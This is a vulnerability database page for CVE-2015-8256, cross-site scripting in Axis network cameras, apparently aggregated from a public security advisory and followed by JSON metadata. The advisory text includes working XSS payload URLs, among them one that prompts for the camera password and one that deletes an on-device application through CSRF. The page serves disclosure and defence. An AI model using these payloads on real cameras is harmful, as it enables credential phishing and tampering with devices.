VAR-201704-0284
Vulnerability from variot - Updated: 2025-04-20 23:29Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I.
technical details
** STORED XSS
1 Attacker injects a javascript payload in the vulnerable page (using
some social enginner aproach):
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
This will generate an error like this on page:
" Error processing XML: Incorrect formatting line number 2, column 60: <error type = "No_such_application" message = "No application" '' ----------------------------------------------------------------^ "
and also will create a entry in the genneral log file (/var/log/messages) with the JSPayload:
" Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find application '' "
When the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports': http://{axishost}/axis-cgi/admin/systemlog.cgi?id
the JSPayload will be interpreted by the browser and the Javascript prompt method will be executed showing a prompt asking user for the password ('AXIS_PASSWORD').
- With this vector an attacker is able to perfome many attacks using javascript, for example to hook users browser, capture users cookie, performe pishing attacks etc.
However, due to CSRF presented is even possible to perform all actions already presented: create, edit and remove users and applications, etc. For example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=
A reflected cross-site scripting affects all models of AXIS devices on the same parameter: http:// {axis-cam-model}/view/view.shtml?imagePath=0WLLalert('AXIS-XSS')<!--
Other Vectors
http:// {axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<!--
http://{axishost}/admin-bin/editcgi.cgi?file=alert(1)
http:// {axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http:// {axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis
alert(1)Show details on source websiteSCRIPTPATHS:
{HTMLROOT}/showReport.shtml {HTMLROOT}/config.shtml {HTMLROOT}/incl/top_incl.shtml {HTMLROOT}/incl/popup_header.shtml {HTMLROOT}/incl/page_header.shtml {HTMLROOT}/incl/top_incl_popup.shtml {HTMLROOT}/viewAreas.shtml {HTMLROOT}/vmd.shtml {HTMLROOT}/custom_whiteBalance.shtml {HTMLROOT}/playWindow.shtml {HTMLROOT}/incl/ptz_incl.shtml {HTMLROOT}/view.shtml {HTMLROOT}/streampreview.shtml
Impact
allows to run arbitrary code on a victim's browser and computer if combined with another flaws in the same devices.
solution
It was not provided any solution to the problem.
Credits
The vulnerability has been discovered by SmithW from OrwellLabs
Legal Notices
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs ++++++++++++++++ doublethinking..
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-0284",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "network camera",
"scope": "eq",
"trust": 1.6,
"vendor": "axis",
"version": null
},
{
"model": "network camera",
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": "communications network cameras",
"scope": "eq",
"trust": 0.3,
"vendor": "axis",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:axis:network_camera_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SmithW from OrwellLabs",
"sources": [
{
"db": "BID",
"id": "97699"
}
],
"trust": 0.3
},
"cve": "CVE-2015-8256",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2015-8256",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-86217",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2015-8256",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-8256",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-8256",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-863",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-86217",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I. \n\ntechnical details\n-----------------\n** STORED XSS\n\n\n# 1 Attacker injects a javascript payload in the vulnerable page (using\nsome social enginner aproach):\n\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\n\nThis will generate an error like this on page:\n\n\"\nError processing XML: Incorrect formatting\nline number 2, column 60:\n\u003cerror type = \"No_such_application\" message = \"No application\" \u0027\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\u0027\n----------------------------------------------------------------^\n\"\n\nand also will create a entry in the genneral log file (/var/log/messages)\nwith the JSPayload:\n\n\"\n\u003cINFO \u003e Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find\napplication \u0027\u003cscript\ntype=\"text/javascript\u003eprompt(\"AXIS_PASSWORD:\")\u003c/script\u003e\u0027\n\"\n\nWhen the user is viewing the log \u0027system options\u0027 -\u003e \u0027support\u0027 -\u003e \u0027Logs \u0026\nReports\u0027:\nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id\n\nthe JSPayload will be interpreted by the browser and the Javascript prompt\nmethod will be executed showing a prompt asking user for the password\n(\u0027AXIS_PASSWORD\u0027). \n\n* With this vector an attacker is able to perfome many attacks using\njavascript, for example to hook users browser, capture users cookie,\nperforme pishing attacks etc. \n\nHowever, due to CSRF presented is even possible to perform all actions\nalready presented: create, edit and remove users and applications, etc. For\nexample, to delete an application \"axis_update\" via SXSS:\n\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript src=\"http://\naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"\u003e\u003c/script\u003e\n\n\nA reflected cross-site scripting affects all models of AXIS devices on the\nsame parameter:\nhttp://\n{axis-cam-model}/view/view.shtml?imagePath=0WLL\u003c/script\u003e\u003cscript\u003ealert(\u0027AXIS-XSS\u0027)\u003c/script\u003e\u003c!--\n\n# Other Vectors\nhttp://\n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E\n\nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=\u003cimg src=\"xs\"\nonerror=alert(7) /\u003e\u003c!--\nhttp://{axishost}/admin-bin/editcgi.cgi?file=\u003cscript\u003ealert(1)\u003c/script\u003e\n\nhttp://\n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E\n\nhttp://\n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp\u0026pageTitle=axis\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cpre\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n\n# SCRIPTPATHS:\n\n{HTMLROOT}/showReport.shtml\n{HTMLROOT}/config.shtml\n{HTMLROOT}/incl/top_incl.shtml\n{HTMLROOT}/incl/popup_header.shtml\n{HTMLROOT}/incl/page_header.shtml\n{HTMLROOT}/incl/top_incl_popup.shtml\n{HTMLROOT}/viewAreas.shtml\n{HTMLROOT}/vmd.shtml\n{HTMLROOT}/custom_whiteBalance.shtml\n{HTMLROOT}/playWindow.shtml\n{HTMLROOT}/incl/ptz_incl.shtml\n{HTMLROOT}/view.shtml\n{HTMLROOT}/streampreview.shtml\n\n\nImpact\n------\nallows to run arbitrary code on a victim\u0027s browser and computer if combined\nwith another flaws in the same devices. \n\nsolution\n--------\nIt was not provided any solution to the problem. \n\nCredits\n-------\nThe vulnerability has been discovered by SmithW from OrwellLabs\n\nLegal Notices\n-----------------\nThe information contained within this advisory is supplied \"as-is\" with no\nwarranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this\ninformation. \n\n\nAbout Orwelllabs\n++++++++++++++++\ndoublethinking..",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8256"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "PACKETSTORM",
"id": "141674"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-86217",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-8256",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "141674",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "39683",
"trust": 1.7
},
{
"db": "BID",
"id": "97699",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-91665",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-86217",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"id": "VAR-201704-0284",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:29:43.640000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30ab\u30e1\u30e9",
"trust": 0.8,
"url": "https://www.axis.com/ja/techsup/cam_servers/index.htm"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/141674/axis-network-camera-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/39683/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/97699"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8256"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8256"
},
{
"trust": 0.3,
"url": "https://www.axis.com/in/en/"
},
{
"trust": 0.1,
"url": "http://{axishost}/admin-bin/editcgi.cgi?file=\u003cscript\u003ealert(1)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://{axishost}/axis-cgi/admin/systemlog.cgi?id"
},
{
"trust": 0.1,
"url": "http://{axishost}/axis-cgi/vaconfig.cgi?action=get\u0026name=\u003cscript"
},
{
"trust": 0.1,
"url": "http://{axishost}/view/custom_whitebalance.shtml?imagepath=\u003cimg"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-86217"
},
{
"db": "BID",
"id": "97699"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-17T00:00:00",
"db": "VULHUB",
"id": "VHN-86217"
},
{
"date": "2017-04-17T00:00:00",
"db": "BID",
"id": "97699"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"date": "2017-03-17T00:08:43",
"db": "PACKETSTORM",
"id": "141674"
},
{
"date": "2017-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"date": "2017-04-17T16:59:00.150000",
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-25T00:00:00",
"db": "VULHUB",
"id": "VHN-86217"
},
{
"date": "2017-04-18T00:07:00",
"db": "BID",
"id": "97699"
},
{
"date": "2017-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007530"
},
{
"date": "2017-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-863"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-8256"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AXIS Network camera cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007530"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "141674"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-863"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…